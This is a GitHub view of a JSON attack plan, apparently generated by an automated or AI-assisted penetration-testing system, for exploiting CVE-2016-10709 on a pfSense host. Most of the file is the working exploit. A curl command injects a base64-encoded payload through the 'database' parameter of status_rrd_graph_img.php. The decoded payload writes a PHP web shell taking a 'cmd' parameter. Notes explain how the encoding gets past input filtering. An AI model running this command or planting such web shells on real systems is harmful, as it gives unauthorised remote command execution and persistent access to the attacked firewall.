-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathTactical.json
More file actions
50 lines (50 loc) · 1.97 KB
/
Tactical.json
File metadata and controls
50 lines (50 loc) · 1.97 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
{
"plan_id": "plan_1737134892_001",
"target_ip": "10.129.12.97",
"context_hash": "pfsense_cve201610709_lighttpd1435",
"attack_vectors": [
{
"vector_id": "vec_01",
"priority": 1,
"action": {
"tool_name": "exploit_runner",
"command_template": "curl -k 'https://{target}/status_rrd_graph_img.php' --data 'database=/var/db/rrd/wan-quality.rrd%3Becho+{encoded_payload}+|+base64+-d+|+sh%3B'",
"parameters": {
"target": "10.129.12.97",
"encoded_payload": "ZWNobyAnPD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8+JyA+IC91c3IvbG9jYWwvd3d3L3NoZWxsLnBocA=="
},
"timeout_seconds": 30
},
"prediction_metrics": {
"classification": {
"attack_type": "RCE",
"mitre_id": "T1190",
"cve_id": "CVE-2016-10709"
},
"hypothesis": {
"confidence_score": 0.85,
"rationale_tags": [
"pfsense_confirmed",
"lighttpd_version_match",
"rag_playbook_success",
"manual_exploitation"
],
"expected_success": true
},
"success_criteria": {
"match_type": "file_creation",
"match_pattern": "shell.php created successfully",
"negative_pattern": "(404 Not Found|403 Forbidden|Connection refused)"
}
},
"rag_context": {
"payload_snippet": "echo '<?php system($_GET[\"cmd\"]); ?>' > /usr/local/www/shell.php",
"insight": "Public exploits fail due to strict filtering - manual base64 encoding bypasses input validation",
"exploitation_logic": "Use directory traversal via database parameter, base64 encode PHP payload to bypass filters, write web shell to accessible www directory",
"vulnerability_context": "pfSense versions with unpatched status_rrd_graph_img.php allowing command injection through database parameter",
"source": "pfsense_cve201610709_playbook"
}
}
],
"created_at": "2025-01-17T18:34:52Z"
}